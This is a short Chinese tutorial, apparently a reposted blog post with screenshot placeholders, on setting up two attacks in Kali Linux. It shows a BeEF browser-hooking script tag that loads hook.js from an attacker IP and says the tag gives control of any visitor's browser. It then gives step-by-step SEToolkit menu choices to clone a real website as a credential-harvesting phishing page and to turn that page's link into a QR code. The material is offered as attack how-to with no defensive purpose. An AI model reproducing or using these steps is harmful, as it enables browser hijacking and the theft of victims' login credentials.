网站克隆：setoolkit社工软件

本文转自行云博客https://www.xy586.top

beef-xss

安装beef-xss：apt install beef-xss 安装完成之后运行beef-xss：

在这里插入图片描述

登录网址：http://192.168.232.138:3000/ui/authentication

在这里插入图片描述

将beef-xss生成的js代码，放入网站中 <script src="http://192.168.232.138:3000/hook.js"></script> 被攻击目标打开网页链接，则beef中得到该电脑控制

在这里插入图片描述

setoolkit：

kali自带setoolkit，终端直接输入setoolkit运行 选择1

在这里插入图片描述

接着选择2，web攻击：

在这里插入图片描述

选择3）credential harvester attack method：

在这里插入图片描述

选择2）site cloner：

在这里插入图片描述

IP默认，克隆网站：http://www.51bb0.cn

在这里插入图片描述

登录IP，克隆成功

在这里插入图片描述

还可使用setoolkit将网页URL生成二维码， 选择8）QRCode Generator Attack Vectors：

在这里插入图片描述

输入网址：www.51bbO.cn生成二维码

在这里插入图片描述

在/root/.set/reports文件夹下，将生成的二维码导出： sz qrcode_attack.png